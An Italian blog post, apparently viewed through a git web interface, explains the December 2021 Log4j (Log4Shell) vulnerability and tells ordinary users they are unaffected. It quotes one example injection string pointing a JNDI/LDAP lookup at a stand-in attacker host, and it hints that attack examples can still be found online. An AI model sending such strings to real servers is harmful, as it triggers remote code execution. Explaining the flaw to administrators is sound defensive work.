blob: bee41f9cf77d743db8f8385ed04bb597cc1ab730 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
<h1>Gravi vulnerabilità in Log4j</h1>
<div class="hyphens">
<p class="date-published">Alessandro Iezzi, 13 dicembre 2021</p>
<p class="italic">Questa vulnerabilità interessa solo amministratori
di sistema e programmatori Java e non i normali utenti.</p>
<p>La modalità di attacco è molto semplice. Molte volte, si
tende a scrivere log di questo tipo:
<code>log.info("User input: {}", userInput)</code> e non c'è nulla
di sbagliato. Se l'utente prova ad inviare una stringa formata, per esempio,
in questo modo: <code>jndi:ldap://hacking.it/Exploit</code> entra in azione
la classe <code>JndiLookup</code> di <code>log4j-core</code>. La libreria,
effettua una chiamata verso quel server LDAP che gli risponderà con
l'URL di un sito web contenente l'exploit. L'exploit verrà eseguito
sul server da Log4j, rendendo inutili strumenti quali firewall e IDS/IPS.
</p>
<p class="italic">Alcuni utenti su GitHub avevano messo esempi di attacco ma
ad oggi (16 dicembre 2021) sono spariti. Se effettuate qualche ricerca,
forse riuscite a trovare ancora qualcosa.</p>
<p class="italic">Ho sentito un'intervista alla radio, l'intervistato
consigliava di aggiornare varie applicazioni mobile e sul computer
nonché il sistema operativo. Questi consigli valgono sempre,
a prescindere dalle vulnerabilità, in questo caso, l'utente tipico
NON deve fare assolutamente nulla, visto che la problematica riguarda noi
programmatori e amministratori di sistema.</p>
<h2>Riferimenti</h2>
<ul>
<li><a href="https://logging.apache.org/log4j/2.x/security.html">https://logging.apache.org/log4j/2.x/security.html</a></li>
<li><a href="https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/">https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/</a></li>
</ul>
</div>
|
